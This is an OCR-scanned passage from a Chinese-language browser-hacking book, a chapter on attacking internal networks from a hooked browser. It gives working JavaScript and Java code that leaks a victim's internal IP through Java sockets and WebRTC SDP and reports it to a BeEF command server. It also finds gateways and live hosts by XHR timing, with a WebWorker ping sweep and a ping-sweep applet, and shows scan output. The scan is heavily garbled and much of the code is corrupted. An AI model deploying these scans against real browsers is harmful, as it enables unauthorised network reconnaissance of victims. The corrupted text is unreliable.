那么 充分 侦察 也 同样 重要 。 事实 上 ， 由 于 浏览 带 存 在 很 多 限制 因素 ,所 以 对 目标 网 络 提 前 有 一 个 i 
清晰 的 了 解 就 更 加 关键 了 。 
第 9 章 介 绍 过 一 些 目 标识 别 方法 ， 其 中 一 些 方 法 也 与 识别 目标 网 络 服务 相关 。 现 在 ， 我们 需 
要 更 进一步 ， 收 集 更 多 关于 目标 的 信息 。 
在 开始 扫描 端口 之 前 , 还 需要 了 解 目 标 子 网 。 最 好 的 起 点 就 是 色 连 浏览 如 所 在 的 子 网 。 在 接 
下 来 的 几 节 中 ， 我 们 会 介绍 发 现 浏览 器 的 内 部 IP 的 方法 以 及 获取 内 部 网 络 信息 的 其 他 方法 。 


10.1.1 识别 勾 连 浏览 器 的 内 部 IP 


我 们 希望 以 最 少 的 努力 换取 尽量 多 的 目标 信息 。 理想 的 过 程 是 调用 一 个 JavaScript 方 法 , 然后 
让 它 返 回 浏览 器 的 内 部 网 络 细节 。 虽 然 这 听 起 来 有 点 不 太 可 能 ， 但 直到 2012 年 年 底 ， 在 Firefox 
中 一 直 都 是 可 以 实现 的 。 

JavaScript 可 以 生成 Java 调 用 ， 从 而 通过 JE 浏览 器 捅 件 来 执行 。 甚 至 还 可 以 实例 化 Java 的 
java.net .Socket 类 。 通 过 这 个 类 ，JavaScript 可 以 取得 浏览 器 的 内 部 耻 和 主机 名 称 。 
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对 仍 在 运 到 行 Java 小 程序 的 浏览 器 来 说 ， 还 是 可 以 提取 其 内 部 网 络 信息 的 ， 只 不 过 现在 需要 用 
户 做 出 动作 。 这 个 限制 是 在 浏览 旨 增 加 点 击 播放 功能 之 后 才 有 的 。 

下 面 的 JavaScript 代 码 展 示 了 如 何在 Firefox 15 之 前 的 版 本 中 ， 提 取 内 部 IP 地 址 和 主机 名 称 。 
从 Firefox16 开 始 ， 在 DOM 中 访问 java 和 Packages 的 LiveConnect 被 禁用 了 ' ( 4.2.1 节 提 到 过 )。 


var sock = new java.net.Socket(); 
var ip =u", 
var hostname = ""; 











try { 
sock.bind(new java.net.InetSocketAddress('0.0.0.0',0)); 
Sock.connect (new java.net.InetSocketAddress (document .domain, 
(!document.location.port) ?80:document.location.port)); 
ip = sock.getLocalAddress().getHostAddress(); 
hostname = sock.getLocalAddress().getHostName(); 


这 里 的 pina() 方 法 在 本 地 计算 机 上 打开 了 一 个 监听 端口 ,并 立即 连接 .连接 之 后 ,getLocal 
Address () 方 法 被 调用 ， 并 返回 一 个 InetAddress 对 象 。 这 个 对 象 中 定义 了 更 多 方法 ， 例 如 
getHostAddress () 可 以 用 来 取得 耻 ， 而 getHostName () 可 以 用 来 取得 当前 套 接 字 连 接 的 主机 
名 称 。 接 着 ， 上 面 的 代码 就 调用 这 些 方法 ， 以 取得 内 部 网 络 的 信息 。 

把 类 似 的 逻辑 封装 在 Java 小 程序 里 ， 也 是 取得 这 些 信息 的 一 种 可 行 的 方法 。 不 过 ， 这 样 会 受 
到 点 击 播放 的 限制 。 看 看 以 下 代码 : 


import java.applet.Applet; 

import java.applet.AppletContext; 
import java.net.InetAddress; 
import java.net.Socket; 


























/* 
* 改编 自 Lars Kindermann 小 程序 
* http://reglos.de/myaddress/MyAddress.html 
*/ 
public class get_internal_ip extends Applet { 
String Ip = "unknown"; 
String internalIp = "unknown"; 
String IpL = "unknown"; 


private String MyIP(boolean paramBoolean) { 


Object obj = "unknown"; 

String str2 = getDocumentBase().getHost(); 
int i = 80; 

if (getDocumentBase().getPort() != -1)( 


i - getDocumentBase().getPort(); 
j 
try ( 
String strl = 
new Socket(str2, i).getLocalAddress().getHostAddress(); 
if (!stri.equals("255.255.255.255")) obj = strl; 
) catch (SecurityException localSecurityException) { 
obj = "FORBIDDEN"; 
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} catch (Exception localExceptionl) { 
obj = "ERROR"; 
} 
if (paramBoolean) try { 
obj = new Socket (str2, i).getLocalAddress().getHostName(); 
} catch (Exception localException2) {} 
return (String) obj; 


} 


public void init() { 
this.Ip = MyIP(false); 
} 


public String ip() { 
return this.Ip; 


} 


public String internalIp() { 
return this.internalIp; 


} 
public void start() {} 


j 

这 些 代码 (在 Lars Kindermann T-JE p SER LEAR ) 在 被 编译 为 未 签名 的 小 程序 之 
后 , 可 以 在 Java 1.6 中 取得 内 部 卫 地 址 。 如 果 将 这 个 小 程序 内 到 网 页 中 , 那 就 可 以 使 用 aocument . 
get_internal_ip.ip() 方 法 查询 这 个 小 程序 。 

Java 1.7u11 开 始 引入 了 针对 未 签名 小 程序 的 点 击 播放 功能 。 也 就 是 说 ， 在 此 之 后 ， 如 果 还 想 
通过 相同 的 方法 取得 内 部 网 络 信息 ， 就 必须 解决 用 户主 动 操作 的 问题 。 显 然 , 这 样 会 减 小 成 功 的 
几率 。 

以 下 的 Java 代 码 将 信息 挖掘 的 深度 更 进 一 层 ， 枚 举 了 其 他 可 用 的 网 络 接口 : 


String output = ""; 
output += "Host Name: "; 
output += java.net.InetAddress.getLocalHost().getHostName()+"\n"; 
output += "Host Address: "; 
output += java.net.InetAddress.getLocalHost().getHostAddress()+"\n"; 
output += "Network Interfaces (interface, name, IP):\n"; 
Enumeration networkInterfaces = NetworkInterface.getNetworkInterfaces(); 
while (networkInterfaces.hasMoreElements()) { 
NetworkInterface networkInterface - 
(NetworkInterface) networkInterfaces.nextElement(); 
output += networkInterface.getName() + ", "; 
output += networkInterface.getDisplayName()+ ", "; 
Enumeration inetAddresses = (networkInterface.getInetAddresses()); 
if (inetAddresses.hasMoreElements() ) { 
while (inetAddresses.hasMoreElements()) { 
InetAddress inetAddress = (InetAddress) inetAddresses.nextElement (); 
output +=inetAddress.getHostAddress() + "\n"; 
} 


}else{ 
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output += "\n"; 
} 
} 


return output; 


BeEF 的 Get System Info 命 AHBURBEI T 与 这 里 非常 相似 的 代码 ， m 日 对 它 进行 了 扩展 ， 包 含 查 
询 Runtime 和 system 等 Java 对 象 的 功能 。 通 过 增加 可 查询 的 对 象 ， 除 了 网 络 信 息 ， 还 可 以 额外 
检测 到 如 下 信息 。 
O Java 虚 拟 机 可 用 的 处 理 需 数量 ; 
Integer.toString(Runtime.getRuntime() .availableProcessors()) 
口 系统 内 存 信 息 : 


Runtime.getRuntime().maxMemory() 
Runtime.getRuntime().freeMemory() 
Runtime.getRuntime().totalMemory() 


O 操作 系统 名 称 、 版 本 及 架构 : 


System.getProperty("os.name"); 
System.getProperty ("os.version"); 
System.getProperty("os.arch"); 


在 BeEF 中 ， 相 应 ee 译 为 Java 类 文件 。 模 块 在 执行 时 ,会 使 用 JavaScript 函 数 


beef.dqom.attachaApplet() ， 把 类 文件 加 载 到 目标 的 浏览 器 。 图 10-1 展 示 了 在 最 新 的 Java 1.6 
插件 中 运行 Get Internal eae 的 输出 。 


























Module Tree Module Results History Command results - 
Browser (46) id a date label 1 Thu Sep 26 2013 11:49:07 
i GMT+0100 (BST) 
=) Chrome Extensions (6) 0 2013-09- command data: 172.16.37.151 
— Debug (8) 261149 1 
.. Exploits (51) 
4 —jHost (17) 


Detect Bit Defender 2012 
D Detect Google Desktop 

Detect Software 

Detect Virtual Machine 

Fingerprint Operating Sys 

Get Internal IP 

Get Physical Location 











图 10-1 Get Internal JP 命令 模块 的 输出 


ZB Aet 


还 记得 第 $ 章 讨论 了 利用 WebRTC 标 准 连接 计算 机 的 网 络 摄像 头 以 辅助 社会 工程 攻击 吗 ? 
WebRTC 还 有 一 个 建议 的 功能 ， 就 是 端 到 端的 连接 组 件 ”。 

在 DOM 中 ,可 以 通过 window.RTCPeerConnection、window.webkitRTCPeerConnection 
或 wvindow .mozRTCPeerConnection 对 象 来 使 用 这 个 功能 ， 具 体 要 看 浏览 器 。 这 个 功能 的 目的 
是 为 语 Web 应 用 提供 端 到 端的 通信 能 力 。 比 如 , 可 以 在 浏览 器 中 发 起 视频 聊天 ， 而 不 依赖 于 Flash 
等 第 三 方 技术 。 

这 个 功能 的 核心 是 ICE (Interactive Connectivity Establishment， 交 互 式 连通 建立 方式 ) 框架 。 
ICE 的 设计 目的 是 为 浏览 器 与 浏览 器 之 间 的 直接 通信 提供 一 种 机 制 。 当 然 ， 防 火 墙 和 NAT 技 术 经 
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常会 阻止 独立 浏览 器 之 间 的 直接 通信 。 因 此 才 有 了 STUN (Session Traversal Utilities for NAT ) 和 
TURN ( Traversal Using Relays around NAT ) 这 两 个 概念 4。 

背后 的 思想 是 以 转发 或 连接 服务 器 作为 两 个 浏览 髓 之 间 的 连通 节点 。 为 了 让 两 个 浏览 器 之 间 
实现 初次 握手 ， 需 要 用 到 SDP (Session Discovery Protocol ) ”。SDP 标 准 描述 了 一 种 通用 语言 ， 用 
于 定义 两 方 建立 连接 所 必需 的 信息 。2013 年 ，Nathan Vander Wit £IL, RTCPeerConnectiony 
实现 ,特别 是 其 中 用 于 构建 SDP 消 息 的 功能 ， 可 以 用 于 发 现 浏 览 器 的 内 部 中 地 址 。 以 下 代码 片段 
演示 了 如 何 通 过 这 个 技术 取得 内 部 IP 地 址 : 


var RTCPeerConnection = window.webkitRTCPeerConnection 
|| window.mozRTCPeerConnection; 














iff (RTCPeerConnection) (function () { 


var addrs = Object.create(null); 
addrs["0.0.0.0"] = false; 


// 与 ICE/ 转 发 服务 器 (这 里 的 NONE) 建立 连接 

var rtc = new RTCPeerConnection({iceServers:[]}); 

// FF 需要 处 理 信道 / 流 

if (window.mozRTCPeerConnection) { 
rtc.createDataChannel('', {reliable:false}); 

y; 





// 根据 发 现 的 ICE， 从 IP 地 址 数据 中 取得 SDP 数 据 
rtc.onicecandidate = function (evt) { 

if (evt.candidate) grepSDP(evt.candidate.candidate) ; 
J 


// 创建 SDP 要 约 开始 进程 
rtc.createOffer(function (offerDesc) { 
// 基于 成 功 的 要 约 取得 SDP 
grepSDP(offerDesc.sdp); 
// 将 此 要 约 设置 为 RTC Peer Connection 的 本 地 描述 
rtc.setLocalDescription(offerDesc) ; 
}, function (e) { // If the SDP offer fails 
beef.net.send('<%= @command_url %>', 
<%= @command_id %>, "SDP Offer Failed"); }); 


// 如 果 此 SDP 要 约 失效 ， 取 得 后 处 理 新 IP 
function processIPs(newAddr) { 
if (newAddr in addrs) return; 
else addrs[newAddr] - true; 
var displayAddrs = Object.keys(addrs).filter(function (k) { 
return addrs[k]; )); 
beef.net.send('«$- Gcommand url %>', 
<%= Qcommand id %>, "IP is " + displayAddrs.join(" or perhaps ")); 


} 


function grepSDP(sdp) { 
var hosts = []; 
//http://tools.ietf.org/html/rfc4566ipage-39 
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sdp.split('\r\n').forEach(function (line) { 
// http://tools.ietf.org/html/rfc4566#section-5.13 
if (-line.indexOf("a-candidate")) { 
// http://tools.ietf.org/html/rfc5245#section-15.1 
var parts - line.split(' '), 
addr - parts[4], 
type = parts[7]; 


if (type === 'host') processIPs(addr) ; 
// http://tools.ietf.org/html/rfc4566#section-5.7 
) else if (-line.indexOf("c-")) ( 


var parts = line.split(' '), 
addr = parts[2]; 
processIPs (addr); 


} 


))0; else ( // 浏览 器 不 支持 RTCPeerConnection 
beef.net.send('<%= @command_url %>', <%= @command_id %>, 


"Browser doesn't appear to support RTCPeerConnection") ; 


} 

以 上 代码 首先 创建 一 个 名 为 rtc 的 RTCPeerConnection 对 象 , 然后 定义 一 个 处 理 程序 ， 用 于 处 
旦 检测 到 的 ICE。 之 后 创建 一 个 SDP 邀 约 ， 构 建 起 一 个 正常 来 说 会 通过 转发 服务 器 被 提交 给 另 一 
端的 9DP。 不 过 ， 由 于 什么 也 没有 设置 ， 所 以 这 里 包含 了 请 求 。 最 后 通过 解析 SDP 字 符 串 ， 提 取 
出 内 部 IP 地 址 。 

有 了 这 些 信息 ， 下 一 步 对 内 网 的 攻击 会 更 有 针对 性 ， 也 更 精准 。 不 过 ， 如 果 Java 或 WebRTC 
不 可 用 ， 那 也 还 有 办 法 ! 还 可 以 分 析 可 能 的 内 部 IP 范 围 。 


10.1.2 ”识别 勾 连 浏览 器 的 子 网 


发 现 浏览 器 的 内 部 PP 地 址 很 有 用 , 但 这 也 并 非 攻击 内 部 网 络 的 决定 性 因素 。 在 1700 多 万 个 地 
址 (RFC1918 地 址 空间 ) 中 找到 目标 地 址 看 似 不 可 能 完成 。 可 是 , 我 们 可 以 通过 一 些 简单 的 推断 ， 
把 问题 缩小 到 可 以 驾驭 的 范围 内 。 

收 罕 潜 在 目标 范围 的 第 一 种 方法 是 根据 既 有 经 验 ， 推 测 可 能 的 内 网 地 址 范围 。 比 如 
10.0.0.0/24 、10.1.1.0/24 或 192.168.1.0/24 都 是 有 可 能 的 。 找 到 这 个 范围 就 是 一 个 好 的 开始 。 当 然 ， 
需要 根据 浏览 器 的 其 他 信息 来 确认 你 的 推测 。 

20094E, Robert Hansen 发 现 ', 在 向 内 部 IP 地 址 发 送 XMLHttpRequest 跨 域 请 求 时 , 响应 返回 
的 速度 很 快 ， 大概 在 秒 级 。 不 过 ， 如 果 主 机 没 开机 ， 那 响应 时 间 就 会 很 长 。 因 为 这 两 种 情况 下 的 
时 间 性 差别 非常 之 大 ， 所 以 可 以 通过 响应 时 间 来 推断 内 网 主机 是 否 处 于 开机 状态 。 

以 下 代码 是 Robert Hansen 代 码 的 增强 版 ,可 以 通过 它们 发 现 当 前 勾 连 浏 览 器 所 在 的 子 网 , 而 
不 用 事先 知道 其 IP 地 址 : 


var ranges = [ 

OZ E68 Ou OL9D L681 0 
'192.168.2.0','192.168.10.0', 
'192.168.100.0','192.168.123.0', 
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'10.0.0.0','10.0.1.0', 
'TO.T.1.0' 

Je 

var discovered_hosts = []; 
// XHR 超 时 

var timeout = 5000; 


function doRequest (host) { 

var d = new Date; 

var xhr = new XMLHttpRequest (); 
xhr.onreadystatechange = processRequest; 
xhr.timeout = timeout; 


function processRequest () { 
if(xhr.readyState == 4){ 
var time = new Date().getTime() - d.getTime(); 
var aborted = false; 
// 如 果 调 用 window.stop()， 触发 的 是 abort 
// http://www.w3.org/TR/XMLHttpRequest/#event-handlers 
xhr.onabort = function() { 
aborted = true; 


xhr.onloadend = function() { 
if(time < timeout) { 
// abort 总 在 onloadend 之 前 触发 
if(time > 10 && aborted === false) { 
console.log('Discovered host ['+host+ 
'] in ['+time+'] ms'); 
discovered hosts.push(host); 


xhr.open("GET", "http://" + host, true); 
xhr.send(); 


} 


var start_time = new Date().getTime(); 
function checkComplete() { 
var current_time = new Date().getTime(); 
if((current time - start_time) > timeout + 1000) { 
// 结束 挂 起 的 XHR， 尤 其 是 在 Chrome 中 
window.stop(); 
clearInterval(checkCompleteInterval); 
console.log("Discovered hosts:\n" + 
discovered hosts.join("WMn")); 


var checkCompleteInterval = setInterval(function()( 
checkComplete()}, 1000); 
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for (var i = 0; i < ranges.length; i++) { 

// 以 下 代码 返回 像 192.168.0 之 类 的 

var c = ranges[i].split('.')[0]+'.'+ 
ranges[i].split('.') [1]+'.'+ 
ranges[i].split('.')[2]+'.'; 

// 对 ranges 数 组 中 的 每 一 项 ， 请 求 最 常见 的 网 关 IP， 类 似 : 
// 192.168.0.1, 192.168.0.100, 192.168.0.254 
doRequest(c + '1'); 

doRequest(c + '100'); 

doRequest(c + '254'); 

} 


数组 ranges 中 包含 了 最 常见 的 默认 网 关 IP 地 址 。 对 于 这 个 数组 中 的 每 一 个 条 目 ， 还 需要 3 个 
不 同 的 IP 地 址 ， 同 样 也 是 最 常见 的 默认 分 配 。 比 如 ， 在 192.168.0.0/24 范 围 中 ， 会 测试 以 下 3 个 IP 
地 址 : 192.168.0.1、192.168.0.100 和 192.168.0.254。 整 个 过 程 会 继续 到 把 所 有 范围 都 测试 一 遍 。 

为 了 跟踪 过 程 , 每 秒 会 调用 一 次 checkcomplete () 函数 , 以 验证 6 秒 钟 的 超时 设置 是 否 已 经 
到 了 。 这 里 只 使 用 了 5 秒 的 XHR 超 时 ， 对 内 部 网 络 也 足够 了 。 如 果 在 这 个 时 间 内 有 XHR 完 成 ， 就 
说 明 找 到 了 主机 。 

EXE, CHU window. stop () 函数 中 断 XHR 请 求 , 以 防 请 求 不 存在 的 主机 延误 太 长 时 间 。 
通常 在 Chrome 等 基于 WebKit 的 浏览 器 中 会 这 样 。 

在 图 10-2 中 ， 可 以 看 到 192.168.0.1 被 找到 了 。 





























i "|| Console ~ | HTML CSS Script DOM Net Cookies 


lè Clear Persist Profile All Errors Warnings Info Debug Info Cookies 
>>> var ranges = | '192.168.0.0','192.168.1.0', '192... doRequest(c + 
'100'); doRequest(c + '254'); } 
> GET http://192.168.0.1/ 2000k 49ms 
> GET http://192.168.0.100/ 4.91s 

> GET http://192.168.0.254/ 4.91s 

> GET http://192.168.1.1/ 4.91s 

> GET http://192.168.1.100/ 4.91s 

> GET http://192.168.1.254/ 4.91s 

> GET http://192.168.2.1/ 4.91s 

> GET http://192.168.2.100/ 4.91s 

> GET http://192.168.2.254/ 4.91s 

> GET http://192.168.10.1/ 4.93s 

> GET http://192.168.10.100/ 4.93s 
> GET http://192.168.10.254/ 4.93s 
> GET http://192.168.100.1/ 4.93s 

> GET http://192.168.100.100/ 4.93s 

> GET http://192.168.100.254/ 4.94s 

> GET http://192.168.123.1/ 4.94s 

> GET http://192.168.123.100/ 4.94s 

> GET http://192.168.123.254/ 4.95s 

> GET http://10.0.0.1/ 4.95s 

> GET http://10.0.0.100/ 4.95s 

> GET http://10.0.0.254/ 4.95s 

> GET http://10.0.1.1/ 4.95s 

> GET http://10.0.1.100/ 4.96s 

> GET http://10.0.1.254/ 4.96s 

上 GET http://10.1.1.1/ 4.96s 

> GET http://10.1.1.100/ 4.97s 

> GET http://10.1.1.254/ 4.97s 
undefined 


Discovered host [192.168.0.1] in [180] ms 


Discovered hosts: 
192.168.0.1 




















图 10-2 成功 找到 192.168.0.1 
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不 过 要 知道 , 在 浏览 器 中 执行 这 种 扫描 操作 会 花 一 定时 间 。 而 可 能 会 影响 到 对 这 些 操作 计时 
的 因素 之 一 ， 是 浏览 器 同时 维护 的 网 络 连接 数量 。 与 浏览 器 的 多 数 其 他 属性 一 样 ,不 同 的 浏览 
或 版 本 中 ,计时 的 结果 可 能 会 有 差异 。 图 10-3 展 示 了 在 不 同 的 浏览 器 中 每 个 主机 的 不 同 连 接 ， 以 
及 一 些 浏览 器 的 最 大 连接 数 。 关 于 这 张 图 以 及 更 多 信息 ， 请 访问 http://www.browserscope.org。 











Summary Ringmark Security Rich Text Selectors API Network Acid3 JSKB 


(Compare | Connections ll ll ll 
CRI cel a) per Max Script Il Script Script Script Async 
name score PerfTiming Hostname Connections Script Stylesheet Image lframe Scripts 


JIE 10 一 12/16 yes yes no yes 


Chrome 26 一 12/16 yes yes yes 


no 
(Firefox 21 一 11/16 yes no yes 
no 


O Safari 6.0.3 一 11/16 yes yes 














图 10-3 ”每 个 主机 的 不 同 连接 以 及 最 大 连接 数 


在 这 个 阶段 ， 你 就 知道 了 色 连 浏览 器 的 网 关 地 址 很 可 能 是 192.168.0.1。 那 么 下 一 步 ， 就 是 识 
别 在 192.168.0.0/24 这 个 子 网 中 有 没有 活动 的 主机 。 这 时 候 就 需要 用 到 ping sweep T o 

















10.2 ping sweep 


知道 了 目标 的 子 网 之 后 ， 下 一 步 就 是 快速 地 检测 有 没有 主机 活动 。 此 时 要 在 浏览 器 中 使 用 
ping sweep 功 能 。 

我 们 知道 ，ping sweep 一 般 在 TCP/IP 或 ICMP 层 执行 ， 而 这 个 操作 指 的 就 是 确定 哪个 IP 地 址 是 
可 以 访问 的 。 可 以 通过 很 多 方法 在 匀 连 浏览 器 中 实现 ping sweep， 下 面 几 节 将 分 别 介绍 











10.2.1 使 用 xuLHttpReqeust 


下 代码 与 前 面 发 现 网 关 的 代码 原理 相同 , 但 为 了 效率 更 高 而 使 用 了 WebWorker。 对 于 可 能 
能 要 求 的 日 标 而 言 , 使 用 WebWorker 发 送 请 求 更 可 靠 一 些 ,虽然 这 个 技术 发 送 的 是 XHR 请 求 ， 
要 求 目 标 IP 地 址 监听 80 端 口 。 没 错 , 甚至 都 不 需要 监听 该 端口 。 这 些 代 码 只 会 检测 XHR 的 
耗 时 ， 来 确定 某 个 JP 后面 有 没有 主机 。 在 这 里 ，WebWorker 执 行 的 代码 如 下 : 


var xhr_timeout, subnet; 

















// 设置 范围 
// FR = 1 (192.168.0.1) 

// EPR = 50 (192.168.0.50) 

// to_scan = 50 

var lowerbound, upperbound, to_scan; 
var scanned = 0; 

var start_time; 


/* 配置 来 自 初 始 化 WebWorkezr 的 代码 (上 层 ) */ 
onmessage = function (e) { 
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xhr_timeout = e.data['xhr_timeout']; 
subnet = e.data['subnet']; 
lowerbound = e.data['lowerbound']; 
upperbound = e.data['upperbound']; 


to scan = (upperbound-lowerbound) +1; 
// 调用 scan () 并 发 送 请 求 
scan(); 


start_time = new Date().getTime(); 
1 


function checkComplete() { 

current time = new Date().getTime(); 

// 检查 当前 时 间 对 Chrome 是 必要 的 

// 因为 有 些 XHR 可 能 因为 主机 下 线 而 需要 较 长 时 间 才 能 返回 

if(scanned === to scan || 
(current time - start time) > xhr_timeout) { 
clearInterval(checkCompleteInterval); 
postMessage({'completed':true}); 
self.close(); //close the worker 

Jelse{ 
// 并 不 是 所 有 XHR 都 会 完成 /超时 


function scan() { 
// 以 下 代码 返回 192.168.0. 


var c = subnet.split('.')[0]«'. '* 
subnet.split('.')[1J+'.'+ 
subnet.split('.')[2]+'.'; 


function doRequest(url) { 

var d = new Date; 

var xhr = new XMLHttpRequest (); 

xhr.onreadystatechange = processRequest; 

xhr.timeout = xhr_timeout; 

function processRequest () { 
if(xhr.readyState == 4) { 


var d2 = new Date; 
var time = d2.getTime() - d.getTime(); 
scanned++; 


if(time < xhr_timeout) { 
if(time > 10)( 
postMessage(('host':url,'time':time, 
'completed':false)); 
j 
) else { 
// 主机 不 在 线 
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xhr.open("GET", "http://" + url, true); 

xhr.send(); 

j 

for (var i = lowerbound; i <= upperbound; i++) { 
var host = c + i; 


doRequest (host); 
} 


var checkCompleteInterval = setInterval (function() { 
checkComplete()}, 1000); 


针对 选 定 范围 内 ( 如 192.168.0.1 到 192.168.0.50 ) 的 每 一 个 IP 地 址 ,这 段 代 码 都 会 发 送 一 次 XHR 
请 求 。 如 果 请 求 完 成 耗 时 不 超过 xhr_timeout ， 那 就 可 以 认为 目标 主机 在 活动 。 如 果 时 间 超 过 
了 5 秒 ， 则 认为 主机 没 开 机 。 当 然 ， 对 于 延迟 较 高 的 网 络 ， 应 该 调 高 这 个 时 间 阅 值 。 

以 下 是 WebWorker 控 制 器 的 代码 ， 用 于 协调 多 个 工作 进程 : 


if(!!window.Worker) { 








// WebWorker4X 4 

var wwloc - "http://browserhacker.com/network-discovery/worker.js"; 
var workersDone - 0; 

var totalWorkersDone - 0; 

var Start o 0; 


// 并 行 执行 的 WebWorkeL 的 数量 

var workers_number = 5; 

// 每 0.5 秒 调用 checkComplete() 

var checkCompleteDelay = 1000; 
var start = new Date().getTime(); 
var xhr_timeout = 5000; 

var lowerbound = 1; 

var upperbound = 50; // 用 5 秒 为 50 个 IP 创 建 50 个 XHR 
var discovered_hosts = []; 

var subnet = "192.168.0.0"; 

var worker_i = 0; 


/* 产生 新 的 NebWorker 来 在 'start' 位 置 处 理 数 据 检 索 */ 
function spawnWorker(lowerbound, upperbound) { 
worker_i++; 
// 使 用 eval 动 态 地 创建 WebWorKketr 变 量 


eval ("var w" + worker i + " = new Worker('" + wwloc + "');"); 

eval ("w" + worker i + ".onmessage = function(oEvent) {" + 

"if (oEvent.data['completed']) {workersDone++;totalWorkersDone++;}else{" + 
"var host = oEvent.data['host'];" + 

"var time = oEvent.data['time'];" + 

"console.log('Discovered host ['+host+'] in ['+time+'] ms');" + 


"discovered_hosts.push(host) ; "+ 

Er ar 

eval("var data = ('xhr timeout':" + xhr timeout + ", 'subnet':'" + subnet + 
"', 'lowerbound':" + lowerbound +", 'upperbound':" + upperbound + "j;"); 

eval("w" + worker i + ".postMessage(data);"); 
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console.log("Spawning worker for range: " + subnet); 


) 


function checkComplete() { 


if (workersDone === workers_number) { 
console.log("Current workers have completed."); 
console.log("Discovery finished on network " + subnet + "/24"); 
clearInterval(checkCompleteInterval); 
var end - new Date().getTime(); 


//window.stop(); 
console.log("Total time [" 


ES 


(end-start)/1000 + "] seconds."); 


console.log("Discovered hosts:\n" + discovered_hosts.join("\n")); 


Jelse{ 
console.log("Waiting for workers to complete..." + 
"Workers done ["+workersDone+"]"); 


j 
} 


function scanSubnet () { 


console.log("Discovery started on network " + subnet + "/24"); 


spawnWorker(1, 50); 
spawnWorker (5 100); 
Mu cd 150); 
spawnWorker(150, 200); 
spawnWorker(201, 254) 
} 


; 


// 第 一 次 调用 
scanSubnet () ; 


var checkCompleteInterval = setInterval (function() { 
checkComplete()}, checkCompleteDelay) ; 


jelsef 


console.log("WebWorker not supported!"); 


) 





这 段 代 码 负责 调试 和 启动 个 别 的 工作 进程 ， 包 括 使 用 postMessage O 传递 适当 的 信息 。 如 
果 你 觉得 这 段 代 码 似曾相识 ， 没 错 ， 第 9 章 讨论 SQL 盲 注 利 用 时 也 使 用 了 类 似 的 代码 。 不 过 在 这 
FA, checkComplete () 函数 简单 了 一 些 。 与 Blind SQLi 的 例子 相 比 ,除了 在 scansupnet () PE 
义 的 工作 进程 ， 不 需要 再 创建 其 他 工作 进程 。 这 里 使 用 了 5 个 WebWorker， 每 个 分 工 处 理 50 个 IP 


地 址 。 
如 图 10-4 所 示 ， 在 Chrome 中 运行 
共 找 到 了 5 个 活动 的 主机 。 


x2 


HU 











面 的 代码 ， 检 测 整 个 192.168.0.0/24 网 络 花 了 大 约 7 秒 。 一 
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Jeco, @browserhacker.com/netw: x V.— 3 





€ C | [5 browserhacker.com/network-discovery/network-discovery.html 








e 


©) Elements Resources Network Sources Timeline ^ Profiles Audits | Console | 
Discovered host [19Z.168.8.78] in [86] ms 

@ XMLHttpRequest cannot load http://192.168.0.2/. Origin http://browserhacker.com is not al 
Discovered host [192.168.0.2] in [89] ms 

@ XMLHttpRequest cannot load http://192.168.0.1/. Origin http://browserhacker.com is not al 
Discovered host [192.168.0.1] in [214] ms 
Waiting for workers to complete...Workers done [0] 
Waiting for workers to complete...Workers done [0] 

Q GET http://192.168.0.4/ 

Discovered host [192.168.0.4] in [2507] ms 

Waiting for workers to complete...Workers done [0] 

Waiting for workers to complete...Workers done [0] 

Waiting for workers to complete...Workers done [0] 

Waiting for workers to complete...Workers done [0] 

Current workers have completed. 

Discovery finished on network 192.168.0.0/24 

Total time [7.011] seconds. 

Discovered hosts: 











图 10-4” 对 192.168.0.0/24 网 络 实施 ping sweep 


再 次 强调 ,虽然 这 个 技术 使 用 了 HTTP 协 议和 80 端 口 ， 但 发 现 主 机 并 不 需要 80 端 口 的 响应 。 
一 点 可 以 通过 图 10-5 看 出 来 ， 这 一 次 是 在 Firefox 中 执行 ping sweep。 如 你 所 见 ，192.168.0.3 和 





192.168.0.4 这 两 个 主机 ,没有 在 80 端 口 运行 任何 服务 。 














* GET browserhacker.com 200 OK browserhacker.com 2.2KB 127.0.0.1:52820 


* GET 192.168.1 200 Ok 192.168.1 4.2KB 192.168.0.2:52821 
* GET 192.168.2 200 OK 192.168.2 2.2 KB 192.168.0.2:52822 
* GET 192.168.3 Aborted 192.168.3 08 
* GET 192.168.4 Aborted 192.168.4 0B 
* GET 192.168.5 192.168.5 08 





图 10-5 ”发 现 主 机 ， 有 的 并 未 运行 Web 服 务 器 





总 的 来 说 ， 这 是 一 种 通过 ping sweep 发 现 可 访问 网 络 主机 的 相对 可 靠 的 方法 。 通 过 分 析 响 应 
耗费 的 时 间 , 可 以 知道 哪些 主机 是 活动 的 、 哪 些 没有 活动 , 与 它们 是 否 在 80 端 口 运行 服务 需 无 关 。 











10.2.2 ”使 用 Java 





男 一 种 执行 ping sweep 的 方法 是 使 用 Java。 不 过 别 忘 了 ， 正 如 第 4 章 介 绍 的 ， 由 于 Java 引 入 点 


击 播放 要 求 用 户 的 明确 参与 ， 所 以 这 种 方法 有 时 候 并 不 会 那么 有 效 。 








此 外 ,下 面 介 绍 的 方法 和 代码 只 对 JRE 1.6.x 及 以 下 版 本 有 效 。 如果 你 想 使 用 未 签名 的 小 程序 ， 


那 可 以 用 这 种 方法 。 以 下 代码 展示 了 通过 Java 实 现 ping sweep 的 过 程 : 


import java.applet.Applet; 

import java.io.IOException; 

import java.net.InetAddress; 

import java.net.UnknownHostException; 
import java.util.ArrayList; 

import java.util.List; 
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public class pingSweep extends Applet { 


public static String ipRange = ""; 
public static int timeout = 0; 
public static List<InetAddress> hostList; 


public pingSweep() { 
super (); 
return; 


} 


public void init() { 
ipRange = getParameter("ipRange"); 
timeout - Integer.parseInt(getParameter("timeout")); 


) 


// JS 中 调用 
public static int getHostsNumber () { 
try{ 

hostList = parselIpRange(ipRange) ; 
}catch (UnknownHostException e) {} 
return hostList.size(); 


} 


// JS 中 调用 
public static String getAliveHosts() { 
String result = ""; 

try{ 

result = checkHosts (hostList); 
}catch (IOException io) {} 

return result; 


} 


private static List«InetAddress» parseIpRange(String ipRange) 
throws UnknownHostException ( 
List«InetAddress» addresses - new ArrayList«InetAddress»(); 
if (ipRange.indexOf("-") !- -1) ( 
// &^*IP, ipRange#W172.31.229.240-172.31.229.250 
String[] ips - ipRange.split("-"); 
String] octets = ips[Olesplit("*XX, Us 
int lowerBound = Integer.parseInt (octets[3]); 


int upperBound = Integer.parseInt(ips[1].split("NN.") [3]) ; 
for (int i = lowerBound; i <= upperBound; i++) { 

String ip = octets[0] + "." + octets[1] + "." + 

octets[2] + "." + i; 


addresses.add(InetAddress.getByName (ip) ) ; 
e // 单个 IP ipRangeX44172.31.229.240 
addresses.add(InetAddress.getByName(ipRange)); 
i enm addresses; 
EE T E T 





418 第 10 章 攻击 网 络 





